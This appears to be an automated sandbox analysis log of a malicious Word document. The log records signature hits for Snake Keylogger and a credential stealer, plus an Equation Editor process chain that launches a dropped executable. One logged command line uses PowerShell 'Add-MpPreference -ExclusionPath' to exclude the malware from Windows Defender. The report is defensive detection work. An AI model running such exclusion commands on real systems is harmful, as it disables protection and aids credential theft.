                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: pgTQ4mfZBbJhpdd[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: cdlpohalgate39567.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, VF3gsb4AyHhvKmAXXL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, VF3gsb4AyHhvKmAXXL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, VF3gsb4AyHhvKmAXXL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, nW3sEsBesrd65eePGN.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@26/8
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$na.docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE9E1.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8................-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8................-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8...............(..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8...............5..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......(.......8...............R..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8...............`..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........z..........................s.................... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8..........................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8................/.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8...............-/.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8...............9/.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....(.......8...............K/.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....(.......8...............W/.........................s............................................Jump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: na.docReversingLabs: Detection: 50%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: na.LNK.0.drLNK file: ..\..\..\..\..\Desktop\na.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: na.docStatic file information: File size 1875360 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: DGaD.pdb source: cdlpohalgate39567.exe, 00000005.00000000.428364525.0000000001012000.00000020.00000001.01000000.00000004.sdmp, cdlpohalgate39567.exe.2.dr, pgTQ4mfZBbJhpdd[1].exe.2.dr
